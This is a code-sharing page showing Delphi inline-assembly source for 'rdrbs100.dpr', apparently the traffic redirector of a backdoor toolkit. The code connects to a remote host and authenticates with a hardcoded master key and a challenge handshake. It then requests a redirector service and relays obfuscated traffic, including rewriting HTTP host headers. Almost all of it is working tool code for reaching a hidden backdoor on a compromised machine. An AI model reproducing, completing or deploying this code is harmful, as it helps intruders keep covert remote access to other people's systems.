📄 rdrbs100.dpr
字号:
@ThreadProc:
mov ebp,esp
sub esp,00Ch
{
-00C - LBuffer:Pointer
-008 - LBytes:Cardinal
-004 - LSocket:TSocket
+004 - AArgs:Pointer
+000 AArgs.ThreadArgs.MainItem:PTcpItem
+004 AArgs.ThreadArgs.OtherItem:PTcpItem
+008 AArgs.ThreadArgs.ThreadType:Cardinal
+00C AArgs.ThreadArgs.Events:Longint
+010 AArgs.ThreadArgs.EventHandle:THandle
+014 AArgs.ThreadArgs.Active:Boolean
+018 AArgs.ThreadArgs.Host.sin_family:Word
+01A AArgs.ThreadArgs.Host.sin_port:Word
+01C AArgs.ThreadArgs.Host.sin_addr:TInAddr
+020..+024 AArgs.ThreadArgs.Host.sin_zero:array[0..7] of Char
+028 AArgs.ThreadArgs.Socket
+02C AArgs.ThreadArgs.Connected - client only
}
mov esi,[ebp+004h]
mov eax,[esi+008h]
test eax,eax
jnz @ThreadProc_redir
mov eax,[esi+02Ch]
test eax,eax
jnz @ThreadProc_client_connected
push eax
push eax
push eax
push eax
push SOCK_ADDR_SIZE
lea eax,[esi+018h]
push eax
push dword ptr [esi+028h]
call WSAConnect
inc eax
jz @ThreadProc_error
lea eax,[esi+010h]
push eax
push dword ptr [esi+028h]
call @EventSelect
// mov [esi+02Ch],eax
test eax,eax
jz @ThreadProc_error
{}
@ThreadProc_preinit_read:
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_init_start
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv
push dword ptr [ebp-00Ch]
call LocalFree
jmp @ThreadProc_preinit_read
@ThreadProc_init_start:
push 014h
pop ebx
@ThreadProc_init_start_send:
//newfeature modulos
push esi
push 003h
pop esi
xor edi,edi
inc edi
@ThreadProc_init_start_modulos:
push 015h
pop eax
sub eax,ebx
xor edx,edx
div esi
test edx,edx
setz al
add edi,eax
inc esi
cmp esi,007h
jb @ThreadProc_init_start_modulos
pop esi
{ //newfeature nil key
mov eax,offset MasterNil
push 000h
push MASTER_KEY_LEN
push eax
push dword ptr [esi+028h]
call send
//\newfeature nil key
}
mov ecx,edi
xor edi,edi
@ThreadProc_init_start_send_loop:
push ecx
//\newfeature modulos
mov eax,offset MasterKey
// xor edi,edi newfeature modulos
push edi
push MASTER_KEY_LEN
push eax
push dword ptr [esi+028h]
call send
pop ecx //newfeature modulos
loop @ThreadProc_init_start_send_loop //newfeature modulos
push 009h
pop edi
@ThreadProc_wait_for_srvinit:
dec edi
jz @ThreadProc_wait_for_srvinit_failed
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
test eax,eax
jz @ThreadProc_wait_for_srvinit
mov ecx,eax
and eax,FD_READ
jnz @ThreadProc_srvinit
and ecx,FD_CLOSE
jnz @ThreadProc_closesock
jmp @ThreadProc_wait_for_srvinit
@ThreadProc_srvinit:
lea eax,[ebp-00Ch]
push 000h
pop dword ptr [eax]
push 000h
push 001h //newfeature was 004
push eax
push dword ptr [esi+028h]
call recv
inc eax
jz @ThreadProc_closesock
mov eax,[ebp-00Ch]
cmp eax,BSC_INIT_REQ_1
jz @ThreadProc_srv_init_1
//newfeature
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_wait_for_srvinit_failed
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_wait_for_srvinit_failed
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv
push dword ptr [ebp-00Ch]
call LocalFree
//\newfeature
@ThreadProc_wait_for_srvinit_failed:
dec ebx
jnz @ThreadProc_init_start_send
jmp @ThreadProc_closesock
@ThreadProc_srv_init_1:
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_srv_init_cmp
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv
push dword ptr [ebp-00Ch]
call LocalFree
push 060h
call Sleep
jmp @ThreadProc_srv_init_1
@ThreadProc_srv_init_cmp:
push 015h
pop ebx
@ThreadProc_srv_init_cmp_loop:
dec ebx
jz @ThreadProc_closesock
mov eax,[ebp-00Ch]
test eax,eax
jnz @ThreadProc_srv_init_2
push BSC_INIT_RES_1
pop dword ptr [ebp-00Ch]
jmp @ThreadProc_srv_init_send
@ThreadProc_srv_init_2:
sub eax,BSC_INIT_REQ_1
jz @ThreadProc_srv_init_x
dec eax
dec eax
jz @ThreadProc_srv_init_x
dec eax
dec eax
jz @ThreadProc_srv_init_x
dec eax
dec eax
jz @ThreadProc_srv_init_sucend
jmp @ThreadProc_closesock
@ThreadProc_srv_init_x:
inc dword ptr [ebp-00Ch]
@ThreadProc_srv_init_send:
push 000h
push 001h
lea eax,[ebp-00Ch]
push eax
push dword ptr [esi+028h]
call send
push 000h
pop dword ptr [ebp-00Ch]
push 019h
pop edi
@ThreadProc_wait_for_sign:
dec edi
jz @ThreadProc_srv_init_cmp_loop
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
test eax,eax
jz @ThreadProc_wait_for_sign
and eax,FD_READ
jz @ThreadProc_wait_for_sign
push 000h
push 001h
lea eax,[ebp-00Ch]
push eax
push dword ptr [esi+028h]
call recv
jmp @ThreadProc_srv_init_cmp_loop
@ThreadProc_srv_init_sucend:
push 000h
push 004h
mov eax,[esi+038h]
lea eax,[eax+02Ch]
push eax
push dword ptr [esi+028h]
call send
push 050h
pop edi
@ThreadProc_wait_for_auth:
dec edi
jz @ThreadProc_closesock
push 019h
call Sleep
push 000h
push 001h
lea eax,[ebp-00Ch]
push eax
push dword ptr [esi+028h]
call recv
inc eax
jz @ThreadProc_wait_for_auth
mov eax,[ebp-00Ch]
cmp eax,BSC_AUTHORIZATION_OK
jnz @ThreadProc_closesock
push 000h
push 001h
lea eax,[ebp-00Ch]
mov byte ptr [eax],BSC_SERVICE_REDIRECTOR
push eax
push dword ptr [esi+028h]
call send
push 000h
push 008h
mov eax,[esi+038h]
lea eax,[eax+01Ch]
push eax
push dword ptr [esi+028h]
call send
push 001h
pop dword ptr [esi+02Ch]
//xxxxxx
jmp @ThreadProc_client_connected
@ThreadProc_redir:
mov edi,[esi+004h]
@ThreadProc_redir_waitforcon:
push 019h
call Sleep
mov eax,[edi+02Ch]
test eax,eax
jz @ThreadProc_redir_waitforcon
@ThreadProc_client_connected:
mov eax,[esi+014h]
test eax,eax
jz @ThreadProc_closesock
mov eax,[esi+004h]
mov eax,[eax+014h]
test eax,eax
jz @ThreadProc_closesock
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
test eax,eax
jz @ThreadProc_client_connected
mov [esi+00Ch],eax
and eax,FD_READ
jnz @ThreadProc_read
@ThreadProc_af_read:
mov eax,[esi+00Ch]
and eax,FD_CLOSE
jnz @ThreadProc_closesock
jmp @ThreadProc_client_connected
@ThreadProc_read:
mov eax,[esi+008h]
test eax,eax
jz @ThreadProc_decrypt
//KKK kkk KKKK kkkk
@ThreadProc_crypt:
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_af_read
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv
mov [ebp-008h],eax
inc eax
jz @ThreadProc_read_free
mov ecx,[esi+06Ch]
mov eax,[ecx+024h]
dec eax
dec eax
jnz @ThreadProc_docrypt
push dword ptr [ecx+028h]
lea eax,[ebp-008h]
push eax
lea eax,[ebp-00Ch]
push eax
call ReplaceHostInHTTPPacket
@ThreadProc_docrypt:
mov edi,[ebp-00Ch]
mov ecx,[ebp-008h]
mov edx,[esi+06Ch]
mov edx,[edx+02Ch]
// jmp @ThreadProc_crypt_done //fucker
test ecx,ecx
jz @ThreadProc_read_loop
@ThreadProc_crypt_loop:
mov al,[edi]
xor al,dl
add al,065h
stosb
ror edx,001h
loop @ThreadProc_crypt_loop
// @ThreadProc_crypt_done: //fucker
push 000h
push 004h
lea eax,[ebp-008h]
push eax
mov eax,[esi+004h]
mov eax,[eax+028h]
push eax
call send
jmp @ThreadProc_read_loop
@ThreadProc_decrypt:
push 000h
push 004h
lea eax,[ebp-008h]
push eax
push dword ptr [esi+028h]
call recv
mov edi,[ebp-008h]
inc eax //breakpoint
jz @ThreadProc_closesock
(*//bugfix
mov [ebp-008h],0FABCDEFAh
push 000h
push 004h
lea eax,[ebp-008h]
push eax
push dword ptr [esi+028h]
call send
mov [ebp-008h],edi
push 000h
push 004h
lea eax,[ebp-008h]
push eax
push dword ptr [esi+028h]
call send
inc eax
jz @ThreadProc_closesock
//\bugfix*)
test edi,edi
jz @ThreadProc_af_read
push edi
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
mov [ebp-008h],edi
mov edx,eax
@ThreadProc_decrypt_wait:
push edx
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
pop edx
mov [esi+00Ch],eax
test eax,eax
jz @ThreadProc_decrypt_wait
and eax,FD_READ
jnz @ThreadProc_decrypt_read_buf
@ThreadProc_decrypt_af_read:
mov eax,[esi+00Ch]
and eax,FD_CLOSE
jnz @ThreadProc_read_free
jmp @ThreadProc_decrypt_wait
@ThreadProc_decrypt_read_buf:
push edx
push 000h
push edi
push edx
push dword ptr [esi+028h]
call recv
pop edx
inc eax
jz @ThreadProc_read_free
dec eax
add edx,eax
sub edi,eax
jnz @ThreadProc_decrypt_af_read
@ThreadProc_decrypt_buf_read:
mov edi,[ebp-00Ch]
mov ecx,[ebp-008h]
mov edx,[esi+038h]
mov edx,[edx+02Ch]
// jmp @ThreadProc_read_loop //fucker
test ecx,ecx
jz @ThreadProc_read_free
@ThreadProc_decrypt_loop:
mov al,[edi]
sub al,065h
xor al,dl
stosb
ror edx,001h
loop @ThreadProc_decrypt_loop
nop
@ThreadProc_read_loop:
//bugfixsleep
push 0FCh
call Sleep
//\bugfixsleep
push 000h
push dword ptr [ebp-008h]
push dword ptr [ebp-00Ch]
mov eax,[esi+004h]
mov eax,[eax+028h]
push eax
call send
inc eax
jz @ThreadProc_read_free
dec eax
sub [ebp-008h],eax
jnz @ThreadProc_read_loop
@ThreadProc_read_free:
push dword ptr [ebp-00Ch]
call LocalFree
jmp @ThreadProc_af_read
@ThreadProc_closesock:
//bugfixsleep
push 0019h
call Sleep
//\bugfixsleep
push dword ptr [esi+028h]
call CloseSocket //breakpoint
@ThreadProc_error:
push 000h
call ExitThread
@BytesToRecv:
xor eax,eax
push eax
push eax
push eax
push eax
lea ecx,[esp+00Ch]
push ecx
push 004h
sub ecx,004h
push ecx
push eax
push eax
push FIONREAD
push [esp+02Ch]
call WSAIoctl
inc eax
jz @BytesToRecv_end
mov eax,[esp]
@BytesToRecv_end:
pop ecx
pop ecx
ret 004h
@PeekMessages:
push ebp
mov ebp,esp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -